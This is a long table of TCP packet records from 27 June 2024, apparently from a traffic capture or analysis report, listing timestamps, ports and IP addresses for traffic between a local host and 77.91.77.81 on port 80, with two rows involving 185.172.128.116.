Jun 27, 2024 05:59:00.551811934 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.551817894 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.551827908 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.551830053 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.551850080 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.551862955 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.551891088 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.551907063 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.551923037 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.551929951 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.551939011 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.551954985 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.551955938 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.551970005 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.551983118 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.552007914 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.552155018 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.552170038 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.552185059 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.552196980 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.552234888 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.552280903 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.552321911 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.575754881 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.575798988 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.575807095 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.575822115 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.575843096 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.575853109 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.575937986 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.575953960 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.575968027 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.575977087 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.575984955 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.575992107 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.576004982 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.576034069 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.576085091 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.576122046 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.576212883 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.576227903 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.576251030 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.576262951 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.576333046 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.576348066 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.576361895 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.576378107 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.576389074 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.576416016 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.607686996 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.607703924 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.607717991 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.607755899 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.607793093 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.607811928 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.607826948 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.607867002 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.607902050 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.607917070 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.607940912 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.607965946 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.608198881 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.608251095 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.608264923 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.608290911 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.608315945 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.608385086 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.608400106 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.608439922 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.608467102 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.608489990 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.608503103 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.608508110 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.608529091 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.608541965 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.608619928 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.608663082 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.608680010 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.608695984 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.608717918 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.608727932 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.608802080 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.608818054 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.608855963 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.608946085 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.608959913 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.608973980 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.608984947 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.608989000 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.609004974 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.609011889 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.609035969 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.609061956 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.609185934 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.609200954 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.609226942 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.609237909 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.609288931 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.609302998 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.609343052 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.609436035 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.609448910 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.609462023 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.609477043 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.609487057 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.609491110 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.609500885 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.609507084 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.609534025 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.609554052 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.609714031 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.609729052 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.609781027 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.610413074 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.610438108 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.610450983 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.610459089 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.610482931 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.610498905 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.610636950 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.610651970 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.610666037 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.610681057 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.610692978 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.610722065 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.610873938 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.610888958 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.610909939 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.610915899 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.610925913 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.610939980 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.610951900 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.610971928 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.610996008 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.611011028 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.611025095 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.611040115 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.611052036 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.611080885 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.611121893 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.611160040 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.611186028 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.611201048 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.611217976 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.611224890 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.611244917 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.611259937 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.611417055 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.611444950 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.611455917 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.611463070 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.611479044 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.611480951 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.611495018 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.611496925 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.611516953 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.611531973 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.611713886 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.611727953 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.611742020 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.611753941 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.611756086 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.611772060 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.611783028 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.611814976 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.612308025 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.612322092 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.612337112 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.612349033 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.612350941 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.612366915 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.612380028 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.612380981 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.612396002 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.612410069 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.612411022 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.612421989 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.612425089 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.612440109 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.612452984 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.612454891 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.612469912 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.612484932 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.612492085 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.612500906 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.612509012 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.612524033 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.612533092 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.612556934 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.612580061 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.612669945 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.612730026 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.612744093 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.612803936 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.612853050 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.612867117 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.612893105 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.612917900 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.612946987 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.612962961 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.613003016 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.638761044 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.638797045 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.638812065 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.638817072 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.638848066 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.638915062 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.638957024 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.638971090 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.638986111 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.638998032 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.639019012 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.639044046 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.639168978 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.639183044 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.639198065 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.639225006 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.639234066 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.639246941 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.639273882 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.639374971 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.639408112 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.639421940 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.639421940 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.639446974 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.639456987 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.662828922 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.662878036 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.662992001 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.663006067 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.663019896 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.663034916 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.663043976 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.663048983 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.663063049 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.663069010 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.663088083 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.663119078 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.663218975 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.663233042 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.663247108 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.663260937 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.663271904 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.663275957 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.663302898 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.663314104 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.663429976 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.663444042 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.663458109 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.663470030 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.663482904 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.663502932 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.682171106 CEST	80	49749	185.172.128.116	192.168.2.7
Jun 27, 2024 05:59:00.682321072 CEST	49749	80	192.168.2.7	185.172.128.116
Jun 27, 2024 05:59:00.694506884 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.694521904 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.694536924 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.694550037 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.694566965 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.694580078 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.694677114 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.694691896 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.694706917 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.694719076 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.694721937 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.694730043 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.694750071 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.694760084 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.695228100 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.695266962 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.695277929 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.695292950 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.695314884 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.695332050 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.695427895 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.695441961 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.695456982 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.695463896 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.695482969 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.695497036 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.695513010 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.695525885 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.695564032 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.695597887 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.695612907 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.695636034 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.695658922 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.695779085 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.695794106 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.695806980 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.695816040 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.695821047 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.695837021 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.695842981 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.695857048 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.695885897 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.696038008 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.696052074 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.696065903 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.696080923 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.696089983 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.696094990 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.696110964 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.696115971 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.696130991 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.696157932 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.696293116 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.696316004 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.696353912 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.696409941 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.696423054 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.696436882 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.696450949 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.696460962 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.696472883 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.696496964 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.696620941 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.696635962 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.696650028 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.696659088 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.696683884 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.696698904 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.697421074 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.697463036 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.697477102 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.697490931 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.697513103 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.697524071 CEST	49748	80	192.168.2.7	77.91.77.81
Jun 27, 2024 05:59:00.697649002 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.697664022 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.697678089 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.697694063 CEST	80	49748	77.91.77.81	192.168.2.7
Jun 27, 2024 05:59:00.697700977 CEST	49748	80	192.168.2.7	77.91.77.81
